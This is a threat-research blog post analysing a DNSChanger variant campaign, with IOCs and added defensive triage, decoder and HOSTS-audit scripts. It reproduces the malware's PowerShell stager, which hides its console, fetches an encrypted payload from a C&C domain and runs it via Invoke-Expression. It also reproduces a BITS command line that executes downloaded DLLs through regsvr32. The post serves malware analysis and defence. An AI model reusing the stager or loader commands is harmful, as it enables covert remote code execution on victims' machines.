Verint’s Cyber Research team has recently discovered evidence of a new campaign for a variant of the infamous DNSChanger Trojan, which, as its name implies, alters a computer’s DNS entries to point toward rogue name servers. The new Trojan was identified through alerts in a Verint Threat Protection System (TPS) installation, which were triggered by its behavioral C&C detection engine. The alerts triggered an automatic investigation in TPS, which identified other suspicious domains and combined all related alerts into one security incident.
Using forensic tools, Verint’s Cyber Research team determined that this DNSChanger campaign reuses familiar characteristics and patterns from previous campaigns, such as PowerShell scripts, BITS jobs and the same communication patterns. Further analysis uncovered the initial infection point, the related payloads and additional domains, and concluded that they are all part of the new campaign. Interestingly, the campaign uses new domains that were registered in March 2017 and had not previously been linked to DNSChanger.
Previous DNSChanger campaigns have been tightly connected with adware and PUAs as a source of (re)infection. This campaign uses a file named “fastdatax.exe”, and initial analysis suggests this file may be the DNSChanger component itself: it creates the BITS jobs that make the DNSChanger network connections to download and execute payloads (see below).
We named the current campaign “FastDataX” since it revolves around a software with this name and communicates with FastDataX[dictionary word].info web sites.
This post is a detailed account of the Verint research team’s findings and covers:
- Initial detection of the malware via behavioral C&C alerts
- Forensic analysis of infection point
- Persistence methods
- Related network traffic analysis
- List of IOCs
INITIAL DETECTION
The Verint Threat Protection System (TPS) issued several behavioral C&C alerts pertaining to several fastdatax*.info domains and started an automatic investigation:


INFECTION POINT
Forensic analysis of the alerted endpoint revealed the following scenario: the user voluntarily downloaded a file from a file-sharing website. When the user double-clicked it, an .xht file (XHTML, an HTML document defined as an XML application) was dropped and executed.
The .xht file included a link to
http[://]ab0cd85de032858b2efc-98b168bd21c640d1dbb3a0f567ddbbfe.r14.cf1.rackcdn.com/kOcQm1koU2hOmFWMxOJbQo0m9p/lpx.html
and displayed several images hosted on imgur.com with instructions on how to save and execute the downloaded software:

Executing the file also triggered a chain of events that led to the installation of several software bundles that can be categorized as PUP/adware, among them YeaDesktop, PCCleanPlus, X-Madbench and FastDataX. Of these, FastDataX was the most curious and insidious.
As with previous campaigns (which abused applications such as Optimizer Pro and System Healer), this adware is the second stage of the DNSChanger infection.
PERSISTENCE
Several persistence mechanisms were utilized by the installed PUP/Adware:
- Registry ‘Run’ key, abused by adware such as YeaDesktop
- Scheduled tasks named after the application, abused by adware such as ‘Pangody’ and X-Madbench. For example, a scheduled task named “X-Madbench” executes rundll32 “C:\Program Files\X-Madbench\X-Madbench.dll”,SceNcISYvR (the string after the comma is the exported function rundll32 calls)
- Scheduled tasks with random GUID-style names that execute DLLs via rundll32, for example a task named “E3605470-291B-44EB-8648-745EE356599A”
- Scheduled tasks with random names that execute PowerShell (see more details below)
- BITS jobs (see more details below)
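The persistence patterns listed above can be triaged from a scheduled-task export. The script below is an added example, not Verint’s code or anything from the campaign: it scores rows of `schtasks /query /v /fo CSV` output with the rules the list describes (GUID-style task names, rundll32 calling a named export in a DLL outside the Windows directory, PowerShell launched with hidden/bypass/encoded switches). The CSV is a constructed sample with a subset of the real columns, and the command lines of the two GUID-named tasks are assumed; the post shows only their names.

```python
"""Triage of scheduled-task persistence (added example, not from the post)."""
import csv
import io
import re

# Constructed sample of `schtasks /query /v /fo CSV` output (subset of the real columns).
# The X-Madbench row mirrors the post; the two GUID rows' commands are assumptions.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -k -g -$"
"WS01","\X-Madbench","Ready","WS01\user","rundll32 ""C:\Program Files\X-Madbench\X-Madbench.dll"",SceNcISYvR"
"WS01","\E3605470-291B-44EB-8648-745EE356599A","Ready","WS01\user","rundll32.exe ""C:\ProgramData\E3605470-291B-44EB-8648-745EE356599A\E3605470.dll"",XyZq"
"WS01","\7D0A0D47-057F-040C-7E11-7E0D7905117D","Ready","WS01\user","powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File ""C:\ProgramData\7D0A0D47-057F-040C-7E11-7E0D7905117D\task.ps1"""
"WS01","\FastDataX","Ready","WS01\user","""C:\Program Files\FastDataX\FastDataX.exe"" /silent"
'''

# Task leaf name that is nothing but a GUID (with or without braces).
GUID_NAME = re.compile(r"^\{?[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?$", re.I)
# rundll32 <dll>,<export>: the export name after the comma is what gets executed.
RUNDLL32_EXPORT = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+\.dll)"?\s*,\s*(?P<export>\S+)', re.I)
# PowerShell invoked with the switches adware and droppers use to stay quiet.
PS_EVASION = re.compile(
    r"powershell(?:\.exe)?.*?(?:"
    r"-w(?:indowstyle)?\s+hidden"         # -w hidden / -WindowStyle Hidden
    r"|-(?:e|enc|encodedcommand)\s"       # base64-encoded command
    r"|-(?:ep|executionpolicy)\s+bypass"  # execution-policy bypass
    r"|-nop(?:rofile)?\b)",               # -NoProfile
    re.I,
)
# DLLs under these prefixes are treated as Microsoft's own; everything else is third party.
SYSTEM_DIRS = ("%systemroot%", "%windir%", "c:\\windows\\")


def triage_schtasks(csv_text: str) -> dict:
    """Return {task name: [reasons]} for every task that trips at least one rule."""
    findings = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        name, cmd = row["TaskName"], row["Task To Run"]
        reasons = []
        leaf = name.rsplit("\\", 1)[-1]
        if GUID_NAME.match(leaf):
            reasons.append("guid-named task")
        m = RUNDLL32_EXPORT.search(cmd)
        if m and not m.group("dll").strip().lower().startswith(SYSTEM_DIRS):
            reasons.append("rundll32 loads third-party DLL export")
        if PS_EVASION.search(cmd):
            reasons.append("powershell with hidden/bypass/encoded flags")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for task, reasons in triage_schtasks(SAMPLE_SCHTASKS_CSV).items():
        print(f"{task}: {', '.join(reasons)}")
```

The rules are behavioural, so the plainly named “FastDataX” task is not flagged on its own; on a real host it is found by name from the IOC list, or by following the GUID task that shares its installation directory. Run the triage against a live export with `schtasks /query /v /fo CSV > tasks.csv` and pass the file contents to `triage_schtasks()`.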
PowerShell
FastDataX.exe maintains persistence via a scheduled task named “FastDataX”; an additional scheduled task with a GUID name (7D0A0D47-057F-040C-7E11-7E0D7905117D) runs the following PowerShell:
# Comments (#) are analyst annotations and are not part of the original script.
$ErrorActionPreference="stop"; $sc="SilentlyContinue"; $WarningPreference=$sc; $ProgressPreference=$sc; $VerbosePreference=$sc; $DebugPreference=$sc;
# Registry update: position the console windows of powershell.exe, svchost.exe and taskeng.exe out of bounds of the screen
# (201329664 = 0x0C000C00, i.e. x = 3072, y = 3072), so the user never sees them.
function RegistryUpdate($p){
    $n="WindowPosition";
    try{ New-Item -Path $p|Out-Null; } catch{ }
    try{ New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|Out-Null; }
    catch{ try{ Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null; } catch{ } }
}
RegistryUpdate("HKCU:\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe");
RegistryUpdate("HKCU:\Console\%SystemRoot%_System32_svchost.exe");
RegistryUpdate("HKCU:\Console\taskeng.exe");
# C&C URL with the GET parameters (parameter value snipped by Verint to protect customer privacy)
$surl="http[://]fastdataxster[.]info/u/?a=2tpeW5PNy/** snipped by VERINT to protect customer privacy */";
$stsk="{7D0A0D47-057F-040C-7E11-7E0D7905117D}";
$prid="FastDataX";
$inid="NRMNUMSW";
try{
    # exit on PowerShell 1.x
    if($PSVersionTable.PSVersion.Major -lt 2){ break; }
    $v=[System.Environment]::OSVersion.Version;
    # exit on Windows 5.x (2000/XP) below Service Pack 2
    if($v.Major -eq 5){ if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion -lt 2)){ break; } }
    # exit unless the current user is an administrator
    if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")){ break; }
    # GET request that downloads further instructions, using a "legitimate"-looking (spoofed) user agent
    function downloadCmd($url){
        $rq=New-Object System.Net.WebClient;
        $rq.UseDefaultCredentials=$true;
        $rq.Headers.Add("user-agent","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)");
        return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));
    }
    # Decryption scheme: byte 0 = number of bytes to exclude from the stream (header plus trailer),
    # byte 1 XOR 0xAA = key; every following byte is XORed with (key + index) AND 0xFF,
    # then the result is decompressed as raw DEFLATE.
    function decryptCmd($rawdata){
        $bt=[Convert]::FromBase64String($rawdata);
        $ext=$bt[0];
        $key=$bt[1] -bxor 170;
        for($i=2; $i -lt $bt.Length; $i++){ $bt[$i]=($bt[$i] -bxor (($key + $i) -band 255)); }
        return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt,2,($bt.Length-$ext))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
    }
    $sc=decryptCmd(downloadCmd($surl));
    Invoke-Expression -command "$sc";
} catch{};
exit 0;
The script sends a GET request to fastdataxster[.]info, decrypts and decompresses the response body and executes the result with Invoke-Expression. Because the decrypted response is run as PowerShell code, the operators can extend the malware’s capabilities at will without touching anything on disk.
The structure of this PowerShell script is similar to a previously analysed DNSChanger PowerShell script. Note that the domain embedded in the script is new and had not previously been linked to the DNSChanger campaign.
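The decryption routine above (decryptCmd) re-implemented as a stand-alone decoder, added here as an example rather than taken from the post or from the malware: it takes the base64 body returned by the GET request and reproduces the script’s steps (byte 0 is the count of bytes to exclude, byte 1 XOR 0xAA is the key, every later byte is XORed with (key + index) AND 0xFF, and the remaining slice is raw DEFLATE). The encoder is an assumption about the server side, included only so the decoder can be exercised on a constructed sample; the WindowPosition helper decodes the DWORD that the RegistryUpdate function writes.

```python
"""Decoder for the FastDataX C&C response framing (added example, not Verint's or the malware's code)."""
import base64
import zlib

KEY_MASK = 0xAA   # byte 1 of the blob is the XOR key masked with 0xAA (170 in the script)
HEADER_LEN = 2    # byte 0 = number of bytes to exclude (header + trailer), byte 1 = masked key


def decrypt_cmd(rawdata: str) -> str:
    """Mirror of decryptCmd(): base64 -> rolling XOR -> raw DEFLATE -> ASCII text."""
    bt = bytearray(base64.b64decode(rawdata))
    if len(bt) < HEADER_LEN:
        raise ValueError("blob shorter than the 2-byte header")
    ext = bt[0]
    key = bt[1] ^ KEY_MASK
    # The script hands DeflateStream the slice [2, 2 + len - ext); the header and the
    # last (ext - 2) bytes are ignored. .NET throws on an impossible length, so reject
    # it explicitly instead of producing garbage.
    if not HEADER_LEN <= ext <= len(bt):
        raise ValueError("inconsistent exclusion count in byte 0")
    for i in range(HEADER_LEN, len(bt)):
        bt[i] ^= (key + i) & 0xFF          # ($key + $i) -band 255
    body = bytes(bt[HEADER_LEN:HEADER_LEN + (len(bt) - ext)])
    # DeflateStream is raw DEFLATE (RFC 1951) with no zlib header, hence wbits = -15.
    return zlib.decompress(body, -15).decode("ascii")


def encrypt_cmd(script: str, key: int = 0x5C, trailer: bytes = b"") -> str:
    """Inverse of decrypt_cmd(). Assumed server-side behaviour, used only to build samples."""
    if not 0 <= key <= 0xFF or len(trailer) > 0xFF - HEADER_LEN:
        raise ValueError("key must be one byte and the trailer must fit in byte 0")
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(script.encode("ascii")) + comp.flush()
    bt = bytearray([HEADER_LEN + len(trailer), key ^ KEY_MASK]) + deflated + trailer
    for i in range(HEADER_LEN, len(bt)):
        bt[i] ^= (key + i) & 0xFF
    return base64.b64encode(bytes(bt)).decode("ascii")


def window_position(value: int) -> tuple:
    """Decode a Console\\...\\WindowPosition DWORD: low word = x, high word = y.
    201329664 = 0x0C000C00 puts the console at (3072, 3072), off any normal screen."""
    return value & 0xFFFF, (value >> 16) & 0xFFFF


if __name__ == "__main__":
    # Constructed sample: a harmless one-liner stands in for the real second stage.
    blob = encrypt_cmd("Write-Output 'stage two'", trailer=b"\x00\x00")
    print(blob)
    print(decrypt_cmd(blob))
    print(window_position(201329664))
```

Feed decrypt_cmd() the response body captured from a fastdataxster[.]info GET session; a ValueError means the blob does not follow this framing (or was truncated in capture), and a zlib error means the key derivation or the slice boundaries differ from this sample of the script.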
BITS job:
FastDataX also uses BITS (Background Intelligent Transfer Service) jobs, which generate HTTP HEAD requests to fastdataxcast[.]info and fastdataxfire[.]info. We could not find any public information about these domains or any association between them and the current campaign.
That said, the two types of BITS jobs are identical in structure to previously analysed DNSChanger BITS jobs.
The following BITS job is an example of a task recovered from the BITS logs of the infected endpoint; it is used to download, install and clean up the malware payloads.
BITS job notification command line, which writes and runs the batch file:
"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\4806190a-7c75-1\x.bat" & echo bitsadmin /complete 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat" & echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-1\x.bat" & echo if exist "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" goto q >> "C:\ProgramData\4806190a-7c75-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\4806190a-7c75-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\%i" >> "C:\ProgramData\4806190a-7c75-1\x.bat")) > nul & echo :q >> "C:\ProgramData\4806190a-7c75-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" >> "C:\ProgramData\4806190a-7c75-1\x.bat" & echo del "C:\ProgramData\4806190a-7c75-1\x.bat" ^& exit >> "C:\ProgramData\4806190a-7c75-1\x.bat" & "C:\ProgramData\4806190a-7c75-1\x.bat""
(the log entry is followed by the user SID ./.S-1-5-21-3582221642-4087043515-2770962101-1001)
The generated x.bat first runs bitsadmin /complete and bitsadmin /cancel on the job (4806190a-7c75-1), so the downloaded files are committed to disk and the job disappears from the queue. If the payload 4806190a-7c75-1.d already exists it jumps to :q; otherwise a regsvr32 line is emitted for every *.tmp file in the job directory. The /n /i switches make regsvr32 call the DLL’s DllInstall export (with the string after /i: as its argument) instead of DllRegisterServer, so the “registration” is simply code execution inside the downloaded DLL. Finally the .d payload is loaded the same way and the batch file deletes itself.
Changes to the DNS settings
DNSChanger has been using one of three methods in order to change the DNS settings:
- Modifying the ‘NameServer’ and ‘DHCPNameServer’ values in the Windows registry, thus replacing the configured servers with new DNS servers, and then calling the DhcpNotifyConfigChange API to apply the change
- Changing the router’s DNS configuration (as analysed by Proofpoint)
- Editing the local HOSTS file
The ‘FastDataX’ variant of DNSChanger uses the third method. It adds multiple domains (see the list in the IOC section of this article) that are used to download additional payloads.
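A HOSTS-file audit for this redirection method, added as an example and not part of the post or of any Verint tooling: it parses the Windows HOSTS file (C:\Windows\System32\drivers\etc\hosts), ignores loopback and 0.0.0.0 sinkhole entries, flags mappings to the 81.171.14.67 address or to a fastdatax*.info name from the IOC section, and lists every other non-loopback mapping for manual review. The file content below is a constructed sample; the real entries from the infected host are not reproduced, and the choice to map the IOC names to 81.171.14.67 in the sample is an assumption.

```python
r"""HOSTS-file audit for DNSChanger-style redirection (added example, not Verint's code)."""
import ipaddress
import re
from dataclasses import dataclass

# Indicators taken from the IOC section of the post.
IOC_IPS = {ipaddress.ip_address("81.171.14.67")}
IOC_DOMAIN = re.compile(r"^fastdatax[a-z]+\.info$", re.I)

# Constructed sample of C:\Windows\System32\drivers\etc\hosts; not the real file.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
#
# Constructed sample for this example.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net        # sinkhole-style entry, benign
81.171.14.67    fastdataxcast.info
81.171.14.67    fastdataxfire.info fastdataxster.info
10.0.0.5        intranet.corp.example
"""


@dataclass
class HostsFinding:
    line: int
    ip: str
    hostname: str
    severity: str   # "ioc" (matches the campaign) or "review" (any other non-loopback mapping)


def parse_hosts(text: str):
    """Yield (line number, ip, hostname) for every mapping; comments and blanks are skipped."""
    for n, raw in enumerate(text.splitlines(), 1):
        entry = raw.split("#", 1)[0].strip()
        if not entry:
            continue
        parts = entry.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line; a full tool would report it rather than skip it
        for host in parts[1:]:
            yield n, ip, host


def audit_hosts(text: str) -> list:
    """Return findings for every mapping that is not loopback/unspecified, IOC matches first by line order."""
    findings = []
    for n, ip, host in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue  # localhost and 0.0.0.0 sinkhole entries are normal
        severity = "ioc" if (ip in IOC_IPS or IOC_DOMAIN.match(host)) else "review"
        findings.append(HostsFinding(n, str(ip), host, severity))
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        print(f"line {f.line}: {f.ip:<16} {f.hostname:<28} [{f.severity}]")
```

The registry variant of the technique (NameServer/DHCPNameServer) cannot be checked offline, but the same IOC sets apply: any interface whose configured resolver is 81.171.14.67 deserves the same treatment as an “ioc” finding here.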
NETWORK ANALYSIS
An analysis with Verint’s TPS Network Forensics component, which enables a detailed network analysis, revealed evidence of the malware’s C&C communication:

This enabled the Cyber Research team to distinguish between three types of sessions with similar structures:
1. HEAD request sessions to “fastdataxfire[.]info” and “fastdataxcast[.]info”. As discussed above, these are generated by the FastDataX BITS jobs:
2. GET request sessions to “fastdataxster[.]info” that were generated by the above mentioned PowerShell script:
3. POST request sessions to “fastdataxient[.]info“, “fastdataxium[.]info” and “fastdataxify[.]info“
It should be noted that all the FastDataX domains resolved to 81.171.14.67, an IP address that was used in a previous DNSChanger campaign.
As can be seen from the above images, the user agents used by the malware differ from one another and are spoofed. A notable example is a “bug” in the user-agent generation, where the string “user agent” appears twice:
The traffic structure matches that observed in earlier DNSChanger campaigns, in which the request parameters carried system information and DNS configuration details.
Below is a list of identified IOCs relating to the FastDataX campaign.
IOCs
Domains/IPs:
Seen on 21-22.06.2017 in Verint TPS:
81.171.14.67
fastdataxium[.]info
fastdataxcast[.]info
fastdataxfire[.]info
fastdataxster[.]info
fastdataxient[.]info
fastdataxify[.]info
Related domains:
Domain | Passive DNS replication date |
fastdataxate.info | 2017-07-07 |
fastdataxsage.info | 2017-07-06 |
fastdataxigy.info | 2017-07-05 |
fastdataxopoly.info | 2017-07-05 |
fastdataxace.info | 2017-06-30 |
fastdataxcube.info | 2017-06-27 |
fastdataxdigita.info | 2017-06-27 |
fastdataxmage.info | 2017-06-27 |
fastdataxmancer.info | 2017-06-27 |
fastdataxmaven.info | 2017-06-27 |
fastdataxpro.info | 2017-06-27 |
fastdataxrunner.info | 2017-06-27 |
fastdataxstar.info | 2017-06-27 |
fastdataxster.info | 2017-06-27 |
fastdataxity.info | 2017-06-27 |
fastdataxality.info | 2017-06-27 |
fastdataxfeed.info | 2017-06-25 |
fastdataxcast.info | 2017-06-21 |
fastdataxfire.info | 2017-06-21 |
fastdataxient.info | 2017-06-21 |
fastdataxify.info | 2017-06-21 |
fastdataxium.info | 2017-06-21 |
fastdataxio.info | 2017-06-08 |
Domains found inside the HOSTS file
We’d be very interested in hearing your comments! Feel free to contact us
The post Watch Out: The FastDataX campaign -DNSChanger is Back! appeared first on Verint.
Article Link: https://cyber.verint.com/watch-fastdatax-campaign-dnschanger-back/